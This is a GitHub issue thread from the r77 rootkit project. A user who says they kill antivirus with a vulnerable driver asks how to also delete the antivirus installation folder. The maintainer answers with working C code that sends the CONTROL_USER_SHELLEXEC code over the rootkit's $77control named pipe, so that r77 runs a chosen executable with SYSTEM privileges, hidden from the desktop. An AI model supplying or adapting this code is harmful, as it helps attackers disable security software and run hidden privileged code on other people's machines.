search

bytecode77 / r77-rootkit

Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections, etc.
https://bytecode77.com/r77-rootkit
BSD 2-Clause "Simplified" License
1.55k stars 383 forks source link

Suggestion #49

Closed KRAFMA closed 9 months ago

KRAFMA commented 10 months ago

Hello man ,

You think it is possible to do a simple poc or add on your r77 any code to force the deletion of a file/folder (example, I can kill some Av with a vuln driver) but the best would be to delete the installation folder after killing

bytecode77 commented 10 months ago

There's no need to modify r77 itself to achieve that. Once r77 is installed & running, you can communicate with the rootkit service through a named pipe. When you send CONTROL_USER_SHELLEXEC, r77 executes a file with SYSTEM privileges fo you - and that executable should delete those files, etc.

There are more control codes, see the documentation for an exhaustive list. Here is an example of how to use one particular control code.

Look at the example in ControlPipe.cpp

#include <Windows.h>

// This example demonstrates how to make r77 perform a ShellExecute.
// All other control codes work similarly.

#define CONTROL_USER_SHELLEXEC 0x3001 // These constants can be found in r77def.h or in the technical documentation

int main()
{
    // Connect to the r77 service. The rootkit must be installed.
    HANDLE pipe = CreateFileW(L"\\\\.\\pipe\\$77control", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (pipe != INVALID_HANDLE_VALUE)
    {
        DWORD controlCode = CONTROL_USER_SHELLEXEC;
        WCHAR shellExecPath[] = L"C:\\Windows\\System32\\notepad.exe";
        WCHAR shellExecCommandline[] = L"mytextfile.txt";

        // Write control code (DWORD)
        DWORD bytesWritten;
        WriteFile(pipe, &controlCode, sizeof(DWORD), &bytesWritten, NULL);

        // Write the path for ShellExec (unicode string including null terminator)
        WriteFile(pipe, shellExecPath, (lstrlenW(shellExecPath) + 1) * 2, &bytesWritten, NULL);

        // Write arguments for ShellExec
        WriteFile(pipe, shellExecCommandline, (lstrlenW(shellExecCommandline) + 1) * 2, &bytesWritten, NULL);

        // Now, a new process "notepad.exe mytextfile.txt" will spawn.
        // You will only see it in TaskMgr. Because this process is running under the SYSTEM user, it does not show up on the desktop.

        // Use the Test Console to try out different control codes.

        CloseHandle(pipe);
    }

    return 0;
}
bytecode77 commented 9 months ago

Closed due to inactivity.